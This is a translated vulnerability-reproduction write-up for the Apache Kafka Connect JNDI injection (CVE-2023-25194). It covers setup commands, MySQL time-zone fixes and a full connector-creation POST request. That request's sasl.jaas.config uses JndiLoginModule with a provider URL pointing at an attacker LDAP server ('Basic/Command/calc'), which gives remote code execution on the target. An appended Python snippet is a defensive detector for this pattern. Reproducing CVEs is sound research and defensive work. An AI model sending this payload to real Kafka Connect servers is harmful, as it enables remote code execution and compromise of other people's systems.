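Apache Kafka JNDI Injection Vulnerability (CVE-2023-25194)

Setting up the vulnerable environment (if startup fails with an error, switching to Java 11 is recommended)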

kafka_2.11-2.4.0.rar(74.6 MB)

http://archive.apache.org/dist/kafka/2.4.0/kafka_2.11-2.4.0.tgz

 

Startup commands

bin\windows\zookeeper-server-start.bat config\zookeeper.properties

bin\windows\kafka-server-start.bat config\server.properties

bin\windows\connect-standalone.bat config/connect-standalone.properties config/connect-file-source.properties config/connect-file-sink.properties

If you see the error "输入行太长 命令语法不正确" (the input line is too long; the syntax of the command is incorrect), enter:

set CLASSPATH=

Reproducing the vulnerability

Visit http://127.0.0.1:8083/connector-plugins to check whether the required connector plugin dependency is present


Next, create a connector with the following request

POST /connectors HTTP/1.1
Host: 127.0.0.1:8083
Content-Type: application/json
Content-Length: 821

{
	"name": "debezium-test-50173",
	"config": {
		"connector.class": "io.debezium.connector.mysql.MySqlConnector",
		"database.hostname": "127.0.0.1",
		"database.port": "3306",
		"database.user": "root",
		"database.password": "root",
		"database.server.id": "316545017",
		"database.server.name": "test1",
		"database.history.kafka.bootstrap.servers": "127.0.0.1:9092",
		"database.history.kafka.topic": "quickstart-events",
		"database.history.producer.security.protocol": "SASL_SSL",
		"database.history.producer.sasl.mechanism": "PLAIN",
		"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://ip:8089/Basic/Command/calc\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
	}
}

Note: the database must be configured first (time zone setting)


Check the time_zone variable

show variables like '%time_zone%';


Set the time zone (the setting does not survive a database restart):

set global time_zone = '+8:00';
flush privileges; # make it take effect immediately
show variables like '%time_zone%';


Method 2:

Edit the configuration file /etc/my.cnf

[mysqld]
default-time_zone = '+8:00'

Query the current time to verify that it is correct

select now();


If that has no effect, try restarting MySQL

systemctl stop mysqld.service
systemctl start mysqld.service
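
A defensive check for the configuration pattern used in the connector-creation request above, as an added example that is not part of the original post: it scans a connector body for any `sasl.jaas.config` value that names `JndiLoginModule` and reports the provider URLs it carries. The function name, connector names and hosts in the samples are constructed for illustration.

```python
import json
import re

# JAAS login module that performs JNDI lookups against URLs supplied in its options.
RISKY_MODULES = ("com.sun.security.auth.module.JndiLoginModule",)
# Options of JndiLoginModule that carry the lookup URLs.
URL_OPTION = re.compile(r'\b(user|group)\.provider\.url\s*=\s*"([^"]*)"')


def audit_connector(body):
    """Return findings for one connector-creation body (dict or JSON text)."""
    if isinstance(body, str):
        body = json.loads(body)
    findings = []
    for key, value in body.get("config", {}).items():
        # Match sasl.jaas.config under any client prefix,
        # e.g. database.history.producer. as in the request above.
        if not key.endswith("sasl.jaas.config"):
            continue
        text = str(value)
        for module in RISKY_MODULES:
            if module in text:
                findings.append({
                    "connector": body.get("name"),
                    "key": key,
                    "module": module,
                    "provider_urls": [m.group(2) for m in URL_OPTION.finditer(text)],
                })
    return findings


# Constructed sample inputs (hypothetical connector names and hosts).
SAMPLE_SUSPICIOUS = {
    "name": "sample-connector-a",
    "config": {
        "connector.class": "io.debezium.connector.mysql.MySqlConnector",
        "database.history.producer.sasl.jaas.config":
            'com.sun.security.auth.module.JndiLoginModule required '
            'user.provider.url="ldap://host.example.invalid:389/x" '
            'useFirstPass="true" serviceName="x" group.provider.url="xxx";',
    },
}
SAMPLE_BENIGN = json.dumps({
    "name": "sample-connector-b",
    "config": {
        "producer.override.sasl.jaas.config":
            'org.apache.kafka.common.security.plain.PlainLoginModule '
            'required username="u" password="p";',
    },
})

if __name__ == "__main__":
    for sample in (SAMPLE_SUSPICIOUS, SAMPLE_BENIGN):
        print(audit_connector(sample))
```

The same function can be run over request bodies captured by a proxy in front of the Connect REST port (8083 in this setup) or over stored connector configurations.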
